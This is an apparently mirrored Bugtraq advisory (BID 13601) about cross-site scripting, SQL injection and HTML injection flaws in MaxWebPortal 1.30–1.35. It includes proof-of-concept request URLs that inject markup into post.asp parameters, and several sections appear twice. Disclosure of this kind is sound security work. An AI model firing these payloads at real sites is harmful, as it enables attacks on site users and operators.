MaxWebPortal Multiple Remote Vulnerabilities
BID:13601
Info
MaxWebPortal Multiple Remote Vulnerabilities
| Bugtraq ID: | 13601 |
| Class: | Input Validation Error |
| CVE: | |
| Remote: | Yes |
| Local: | No |
| Published: | May 11 2005 12:00AM |
| Updated: | May 11 2005 12:00AM |
| Credit: | Discovery is credited to Zinho <[email protected]>. |
| Vulnerable: |
MaxWebPortal MaxWebPortal 1.35 MaxWebPortal MaxWebPortal 1.33 MaxWebPortal MaxWebPortal 1.32 MaxWebPortal MaxWebPortal 1.31 MaxWebPortal MaxWebPortal 1.30 |
| Not Vulnerable: | |
Discussion
MaxWebPortal Multiple Remote Vulnerabilities
MaxWebPortal is affected by multiple remote vulnerabilities. These issues may allow an attacker to carry out cross-site scripting, SQL injection and HTML injection attacks.
MaxWebPortal 1.3.5 and prior versions are reportedly vulnerable to these issues.
MaxWebPortal is affected by multiple remote vulnerabilities. These issues may allow an attacker to carry out cross-site scripting, SQL injection and HTML injection attacks.
MaxWebPortal 1.3.5 and prior versions are reportedly vulnerable to these issues.
Exploit / POC
MaxWebPortal Multiple Remote Vulnerabilities
An exploit is not required.
Proof of concept examples are available:
Cross-site Scripting
/post.asp?method=Topic&FORUM_ID=1& CAT_ID=1&Forum_Title=%00General+Chat&mod="><plaintext>
/post.asp?method=Topic&FORUM_ID=1& CAT_ID=1&Forum_Title=%00General+Chat&M="><plaintext>
/post.asp?method=Topic&FORUM_ID=1& CAT_ID=1&Forum_Title=%00General+Chat&type="><plaintext>
HTML Injection:
/post.asp?method=Topic&FORUM_ID=1& CAT_ID=1&Forum_Title=http://<plaintext>
An exploit is not required.
Proof of concept examples are available:
Cross-site Scripting
/post.asp?method=Topic&FORUM_ID=1& CAT_ID=1&Forum_Title=%00General+Chat&mod="><plaintext>
/post.asp?method=Topic&FORUM_ID=1& CAT_ID=1&Forum_Title=%00General+Chat&M="><plaintext>
/post.asp?method=Topic&FORUM_ID=1& CAT_ID=1&Forum_Title=%00General+Chat&type="><plaintext>
HTML Injection:
/post.asp?method=Topic&FORUM_ID=1& CAT_ID=1&Forum_Title=http://<plaintext>
Solution / Fix
MaxWebPortal Multiple Remote Vulnerabilities
Solution:
Currently we are not aware of any vendor-supplied patches for this issue. If you feel we are in error or are aware of more recent information, please mail us at: [email protected] <mailto:[email protected]>.
Solution:
Currently we are not aware of any vendor-supplied patches for this issue. If you feel we are in error or are aware of more recent information, please mail us at: [email protected] <mailto:[email protected]>.
References
MaxWebPortal Multiple Remote Vulnerabilities
References:
References:
- MaxWebPortal Homepage (MaxWebPortal)
- MaxWebPortal - Multiple SQL injection/XSS (Zinho
)